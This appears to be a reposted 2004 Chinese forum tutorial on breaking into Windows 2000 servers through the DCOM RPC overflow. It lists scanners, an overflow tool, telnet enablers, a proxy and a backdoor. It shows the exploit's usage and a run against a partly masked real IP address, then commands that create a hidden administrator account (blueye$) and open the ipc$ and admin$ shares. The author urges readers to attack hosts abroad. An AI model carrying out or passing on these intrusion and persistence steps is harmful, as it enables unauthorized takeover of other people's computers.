首页 电脑 电脑学堂 查看内容

手把手教你入侵-only for you

2004-9-29 20:05 610 0

摘要: 家好,现在网上很流行dcomrpc,哈哈,那好就说说利用dcomrpc入侵,大家不要破坏国内主机哟,到别的地方去试试:) 需要的工具:   很好的: radmin.exe   扫描工具: retin...
关键词: dcomrpc system 命令 winnt 成功 漏洞 主机 Default Expl01t 端口

家好,现在网上很流行dcomrpc,哈哈,那好就说说利用dcomrpc入侵,大家不要破坏国内主机哟,到别的地方去试试:) 需要的工具:   很好的: radmin.exe   扫描工具: retinarpcdcom.exe   溢出攻击工具:RpcDcom(通用溢出工具)   脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe   代理:sksockserver.exe   后门程序:WinEggDropShellPro3thVersion   好了,该做的都做的差不多了。现在开始把~~   首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必   随便扫一下就会发现有许多主机开放的135端口)。。。。。。   (人走运座着都能检到钱) 211.217.50.xx 第一个主机就被扫出来又此漏洞。开始工作   看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k哈哈,是win2k server版本   展开命令行:   [查看dcomrpc的用法 用法 dcomrpc -d [options]  ]   F:\hack>cd rpc\dcomrpc   RPC DCOM Expl01t coded by .:[oc192.us]:. Security   Complied and Modified by Expl01t www.longker.com   Usage:   dcomrpc -d [options]   Options:      -d:    Hostname to attack [Required]      -t:    Type [Default: 0]      -r:    Return address [Default: Selected from target]      -p:    Attack port [Default: 135]      -l:    Bindshell port [Default: 666]   Types:      0 [0x0018759f]: [Win2k-Universal]      1 [0x0100139d]: [WinXP-Universal]   开始进行溢出:   F:\hack>cd rpc\dcomrpc -d 211.217.50.xx 0   RPC DCOM remote expl01t - .:[oc192.us]:. Security   Complied and recorrected by Expl01t www.longker.com   [+] Resolving host..   [+] Done.   [+] Expl01ting....Just wait......   等到出现,说明溢出成功   c:\winnt\system32>   接着我们建立用户   c:\winnt\system32>net user blueye$ 1111 /add   命令成功完成。   把用户添加成超级管理员   c:\winnt\system32>net localgroup administrators blueye$ /add   命令成功完成。   看看共享开了没有,没有的话把共享开开   c:\winnt\system32>net share   清单是空的。   c:\winnt\system32>net share ipc$   命令成功完成。   c:\winnt\system32>net share admin$   命令成功完成。   到这里我们入侵告一段落
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部